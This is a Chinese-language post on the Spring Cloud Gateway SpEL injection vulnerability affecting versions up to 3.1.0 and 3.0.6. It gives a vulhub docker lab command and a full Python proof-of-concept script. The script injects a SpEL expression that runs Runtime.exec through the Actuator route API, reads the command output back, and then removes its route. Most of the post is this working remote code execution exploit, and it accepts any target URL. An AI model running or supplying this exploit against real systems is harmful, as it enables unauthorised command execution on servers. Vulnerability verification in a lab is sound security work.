简介:
Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令.
漏洞环境:
docker run -d -p 8080:8080 vulhub/spring-cloud-gateway:3.1.0
访问8080端口:
POC:
import requests import json import re #添加路由 print("cve") url_host = input("请输入要测试的地址:") data = { "id": "hacktest", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}" } }], "uri": "http://example.com" } headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/json', 'Connection': 'close', 'Accept': '*/*', 'Accept-Language': 'en', } try: url = url_host + "/actuator/gateway/routes/hacktest" res = requests.post(url=url,data=json.dumps(data),headers=headers) print(res.text) print(res.status_code) except Exception as e: print("输入地址有误请重试") exit(1) #刷新路由 headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Connection': 'close', 'Content-Length': '0', 'Accept': '*/*', 'Accept-Language': 'en', } url = url_host + "/actuator/gateway/refresh" res = requests.post(url=url,headers=headers) print(res.text) print(res.status_code) #执行过程 url = url_host + "/actuator/gateway/routes/hacktest" headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '0', 'Connection': 'close', 'Accept': '*/*', 'Accept-Language': 'en', } try: res = requests.get(url=url,headers=headers) print(res.text) print((re.search(r".*AddResponseHeader Result =(.*)",res.json()["filters"][0])).group(1).replace(r"'","")) # [[AddResponseHeader Result = 'uid=0(root) gid=0(root) groups=0(root)'], order = 1] print(res.status_code) except Exception as e: print("漏洞不存在") exit(1) #删除路由 url = url_host + "/actuator/gateway/routes/hacktest" headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Connection': 'close', 'Accept': '*/*', 'Accept-Language': 'en', } res = requests.delete(url=url,headers=headers) print(res.text) print(res.status_code) #最后一步刷新路由 url = url_host + "/actuator/gateway/refresh" headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Connection': 'close', 'Content-Length': '0', 'Accept': '*/*', 'Accept-Language': 'en', } res = requests.post(url=url,headers=headers) print(res.text) print(res.status_code) print("存在漏洞")
可以执行id命令,就代表存在,反之就不存在。
如果python要用requests模块发送json请求,要先用Json.dumps转成json格式再发送,python的字典的类型的key和values都要是字符串